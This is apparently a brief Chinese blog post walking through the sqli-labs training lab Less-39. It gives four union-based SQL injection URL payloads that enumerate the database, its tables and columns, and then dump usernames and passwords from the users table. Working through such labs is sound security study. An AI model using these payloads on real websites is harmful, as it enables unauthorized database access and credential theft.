Less(39)

1.和Less(38)差不多

2.爆破

  (1)爆库:?id=0%9 union select 1,2,database() %23

    

  (2)爆表:?id=0%9 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

    

 

 

  (3)爆列名:?id=0%9 union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" %23

    

 

 

  (4)爆值:?id=0%9 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

    

 

 

 

 

 

 

 

      

posted @ 2020-03-14 11:03  孟雨  阅读(111)  评论(0编辑  收藏  举报